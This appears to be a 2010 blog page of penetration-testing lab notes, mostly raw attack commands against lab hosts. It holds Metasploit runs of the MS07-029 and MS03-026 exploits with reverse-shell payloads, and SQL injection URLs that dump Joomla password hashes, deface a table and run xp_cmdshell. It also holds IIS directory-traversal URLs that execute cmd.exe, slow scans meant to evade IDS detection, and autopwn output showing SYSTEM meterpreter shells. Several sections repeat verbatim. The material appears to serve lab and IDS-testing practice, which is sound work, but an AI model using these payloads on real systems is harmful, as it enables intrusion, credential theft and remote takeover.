Solutions
1. MS-DNS RPC Vulnerability (MS07-029)
msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit
2. SQL Injection Vulnerability in Joomla Component (Amblog)
Link: http://www.exploit-db.com/exploits/14596/
http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
Tuesday, November 23, 2010
Monday, November 22, 2010
IDS Testing (Samples)
TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126
From TEST-BT4, launch these commands:
Anomaly Test
ping -s 65000 131.107.1.254
Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254
Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt
http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess
IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--
Exploit Test
cd /pentest/exploits/framework3
./msfconsole
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
From TEST-BT4, launch these commands:
Anomaly Test
ping -s 65000 131.107.1.254
Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254
Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt
http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess
IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--
Exploit Test
cd /pentest/exploits/framework3
./msfconsole
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
Monday, November 15, 2010
Metasploit Autopwn with Nessus
Use SQLite3 database driver
msf > db_driver sqlite3
Create "pentest" database
msf > db_create pentest
Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus
Display matching exploit modules
msf > db_autopwn -t -x
Launch matching exploits
msf > db_autopwn -e -x -r
Display open sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068
msf > sessions -l
msf > sessions -i 1
msf > db_driver sqlite3
Create "pentest" database
msf > db_create pentest
Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus
Display matching exploit modules
msf > db_autopwn -t -x
Launch matching exploits
msf > db_autopwn -e -x -r
Display open sessions
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068
msf > sessions -l
msf > sessions -i 1
Subscribe to:
Posts (Atom)